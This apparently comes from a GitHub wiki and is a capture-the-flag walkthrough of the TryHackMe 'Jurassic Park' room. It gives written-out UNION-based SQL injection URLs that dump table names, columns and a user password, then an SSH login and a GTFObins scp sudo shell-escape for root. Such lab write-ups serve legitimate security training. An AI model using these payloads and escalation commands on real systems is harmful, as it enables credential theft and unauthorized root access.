Jurassic Park (TryHackMe) - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki

Jurassic Park Write-up

Screenshot from 2023-08-11 16-12-35

This is the writeup for the Jurassic Park CTF on TryHackMe! This box involves some sql injection in order to gain credentials to a linux server. The privesc pathway is a classic linux bin exploit.

https://tryhackme.com/room/jurassicpark

jurassic park ctf walkthrough

tags: sqli, dinosaurs, linux_privesc

ENUMERATION

First let's kick things off with a fast nmap scans to get a quick lay of the land.

export IP=10.10.82.128 nmap -F $IP

Screenshot from 2023-08-12 17-17-49

Next, we'll start another scan in the background to check scripts and the higher ports.

sudo nmap -sC -sV -A -p- $IP -oN nmap.script.scan.txt

This scan doesn't turn up anything else of use. Let's move on to walking the website on port 80. Probably we can find some credentials for logging into the server via ssh.

WALKING THE WEBSITE

On the landing page we see a link to a store and hear the JP theme song. A quick look at the source code shows an assets directory. This dir is accessible to us and we find a bunch of images, sounds, and a few gifs.

Looking at how the address changes for each of the packages, I noticed a pattern id=1, id=2, id=3. Playing around with this I tried id=4 and id=5 and discovered a message on the id=5 page.

Here is the secret message: Screenshot from 2023-08-12 17-23-53

SQLmap

I also fired up sqlmap to see if there are any interesting findings. It scanned for a long time but didn't come up with anything in the end.

SQL injection

So we know that we are dealing with some kind of database and a few characters that have been blocked by the admin. After toying around with some different sql injection techniques, I was able to display the database name and a system os version with the following inline address:

'http://10.10.169.116/item.php?id=5%20union%20all%20select%20101,database(),365,version(),5'

Screenshot from 2023-08-12 17-27-35

Further enumeration led me to expose the table names: http://10.10.169.116/item.php?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

And the columns of table 'users':

http://10.10.169.116/item.php?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = “users”

image

And finally we can grab the password: http://10.10.169.116/item.php?id=5 union select 1,2,3,password,5 from users

image

Assuming that the Dennis mentioned in ?id=5 might be a username, let's go ahead and ssh our way into the server with this password.

'ssh dennis@$IP'

ENUMERATING SSH

sudo -l

##LOCAL ENUMERATION AND EXPLOITATION**

Checking sudo -l shows a curious permission.

The bash history reveals some juicy details including a few flags and a curious use of the scp command.

history

Screenshot from 2023-08-12 17-34-37

Checking the vim_history also reveals another flag. vim_history

Linux Privesc

Let's check GTFObins to see if there is a way to achieve persistent sudo permissions (root access) with the scp bin.

Screenshot from 2023-08-12 17-38-46 e persistent sudo permissions (root access) with the scp bin.

We can perform this privesc with the following commands:

TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y:

And we now have elevated our permissions to the root user!

The final flag can be captured by running the script in dennis' home folder as root, or by locating it with find and then catting it out.

Thanks for reading!

⚠️ **GitHub.com Fallback** ⚠️